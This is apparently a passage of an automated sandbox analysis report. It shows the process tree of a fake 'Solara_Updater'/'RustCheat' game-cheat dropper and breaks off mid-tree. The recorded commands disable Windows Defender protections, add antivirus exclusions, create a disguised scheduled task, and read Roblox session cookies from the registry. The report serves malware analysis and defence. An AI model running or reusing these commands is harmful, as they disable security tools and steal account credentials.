- Suspicious behavior: EnumeratesProcesses
PID:2356
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1888
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\svhost.exe"4⤵
- Creates scheduled task(s)
PID:2076
-
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1992 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1076
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"4⤵
- Views/modifies file attributes
PID:976
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:836
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 24⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1776
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2608
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2628
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory4⤵PID:2552
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵PID:2528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2712
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name4⤵
- Detects videocard installed
PID:2900
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause4⤵PID:976
-
C:\Windows\system32\PING.EXEping localhost5⤵
- Runs ping.exe
PID:2324
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"3⤵PID:2604
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "4⤵
- Loads dropped DLL
PID:2628 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"5⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:2676 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wr50u5fg\wr50u5fg.cmdline"6⤵PID:1524
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7D4B.tmp" "c:\Users\Admin\AppData\Roaming\CSCB45058D06F694B8593882A1D59855C26.TMP"7⤵PID:1484
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\noo5nlwe\noo5nlwe.cmdline"6⤵
- Drops file in System32 directory
PID:2064 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7D89.tmp" "c:\Windows\System32\CSCF6C8047328354985AF527578961D7E65.TMP"7⤵PID:940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\GP6pjYPh8x.bat"6⤵PID:1684
-
C:\Windows\system32\chcp.comchcp 650017⤵PID:1588
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost7⤵
- Runs ping.exe
PID:2608
-
-
C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\taskeng.exe"C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\taskeng.exe"7⤵
- Executes dropped EXE
PID:2076
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2432 -
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"3⤵
- Executes dropped EXE
PID:2696
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2556 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"4⤵PID:760
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "5⤵
- Loads dropped DLL
PID:1288 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"6⤵
- Executes dropped EXE
PID:2588
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2904 -
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2756 -
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2952
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"5⤵
- Executes dropped EXE
PID:1488
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"5⤵PID:2412
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "6⤵
- Loads dropped DLL
PID:1744 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"7⤵
- Executes dropped EXE
PID:1220
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1256 -
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"5⤵
- Executes dropped EXE
PID:2328
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1832 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"6⤵PID:1216
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "7⤵
- Loads dropped DLL
PID:1560 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"8⤵
- Executes dropped EXE
PID:1848
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"5⤵PID:1984
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"6⤵
- Executes dropped EXE
PID:2308 -
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"7⤵
- Executes dropped EXE
PID:1556
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"7⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1996 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid8⤵PID:2824
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"8⤵
- Views/modifies file attributes
PID:1500
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1740
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 28⤵
- Suspicious behavior: EnumeratesProcesses
PID:2528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY8⤵
- Suspicious behavior: EnumeratesProcesses
PID:1232
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY8⤵
- Suspicious behavior: EnumeratesProcesses
PID:1508
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption8⤵PID:2892
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory8⤵PID:2948
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid8⤵PID:1772
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER8⤵
- Suspicious behavior: EnumeratesProcesses
PID:2968
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name8⤵
- Detects videocard installed
PID:2608
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause8⤵PID:2680
-
C:\Windows\system32\PING.EXEping localhost9⤵
- Runs ping.exe
PID:1452
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"6⤵
- Executes dropped EXE
PID:468 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"7⤵PID:1464
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "8⤵
- Loads dropped DLL
PID:2916 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"9⤵
- Executes dropped EXE
PID:2192
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"6⤵PID:1036
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"7⤵
- Executes dropped EXE
PID:2152
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"7⤵
- Executes dropped EXE
PID:1844 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"8⤵PID:3020
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "9⤵
- Loads dropped DLL
PID:848 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"10⤵
- Executes dropped EXE
PID:2244
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"7⤵PID:2080
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"8⤵
- Executes dropped EXE
PID:2124 -
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"9⤵
- Executes dropped EXE
PID:664
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"9⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:680 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid10⤵PID:2012
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"10⤵
- Views/modifies file attributes
PID:2632
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'10⤵
- Command and Scripting Interpreter: PowerShell
PID:2660
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 210⤵PID:3004
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY10⤵PID:2032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY10⤵PID:1840
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption10⤵PID:1460
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory10⤵PID:2888
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid10⤵PID:2372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER10⤵PID:1452
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name10⤵
- Detects videocard installed
PID:1420
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause10⤵PID:3012
-
C:\Windows\system32\PING.EXEping localhost11⤵
- Runs ping.exe
PID:1228
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"8⤵
- Executes dropped EXE
PID:2228 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"9⤵PID:832
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "10⤵
- Loads dropped DLL
PID:1452 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"11⤵
- Executes dropped EXE
PID:2376
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"8⤵PID:1776
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"9⤵
- Executes dropped EXE
PID:2624
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"9⤵
- Executes dropped EXE
PID:2488 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"10⤵PID:840
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "11⤵
- Loads dropped DLL
PID:2288 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"12⤵
- Executes dropped EXE
PID:2392
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"9⤵PID:524
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"10⤵
- Executes dropped EXE
PID:1220
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"10⤵
- Executes dropped EXE
PID:2376 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"11⤵PID:1892
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "12⤵
- Loads dropped DLL
PID:1960 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"13⤵
- Executes dropped EXE
PID:1508
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"10⤵PID:2052
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"11⤵
- Executes dropped EXE
PID:2756
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"11⤵
- Executes dropped EXE
PID:2420 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"12⤵PID:2576
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "13⤵
- Loads dropped DLL
PID:1476 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"14⤵
- Executes dropped EXE
PID:2252
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"11⤵PID:1852
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"12⤵
- Executes dropped EXE
PID:2512
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"12⤵
- Executes dropped EXE
PID:2536 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"13⤵PID:2660
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "14⤵
- Loads dropped DLL
PID:2748 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"15⤵PID:1344
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"12⤵PID:2532
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"13⤵
- Executes dropped EXE
PID:2492
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"13⤵
- Executes dropped EXE
PID:1356 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"14⤵PID:380
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "15⤵
- Loads dropped DLL
PID:756 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"16⤵PID:1924
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"13⤵PID:1644
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"14⤵
- Executes dropped EXE
PID:2328
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"14⤵
- Executes dropped EXE
PID:1460 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"15⤵PID:1756
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "16⤵
- Loads dropped DLL
PID:2272 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"17⤵PID:1252
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"14⤵PID:1120
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"15⤵
- Executes dropped EXE
PID:876
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"15⤵
- Executes dropped EXE
PID:1844 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"16⤵PID:1760
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "17⤵
- Loads dropped DLL
PID:1848 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"18⤵PID:1108
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"15⤵PID:3052
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"16⤵
- Executes dropped EXE
PID:1976
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"16⤵
- Executes dropped EXE
PID:2032 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"17⤵PID:3000
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "18⤵
- Loads dropped DLL
PID:2832 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"19⤵PID:780
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"16⤵PID:2832
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"17⤵
- Executes dropped EXE
PID:1600
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"17⤵
- Executes dropped EXE
PID:1784 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"18⤵PID:1260
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "19⤵
- Loads dropped DLL
PID:1412 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"20⤵PID:3044
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"17⤵PID:2468
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"18⤵
- Executes dropped EXE
PID:2560
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"18⤵
- Executes dropped EXE
PID:688 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"19⤵PID:1368
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "20⤵
- Loads dropped DLL
PID:2124 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"21⤵PID:772
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"18⤵PID:1460
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"19⤵
- Executes dropped EXE
PID:1576
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"19⤵
- Executes dropped EXE
PID:2052 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"20⤵PID:296
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "21⤵
- Loads dropped DLL
PID:2088 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"22⤵PID:2740
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"19⤵PID:1840
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"20⤵
- Executes dropped EXE
PID:1720 -
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"21⤵PID:2172
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"21⤵PID:1352
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"20⤵
- Executes dropped EXE
PID:1884 -
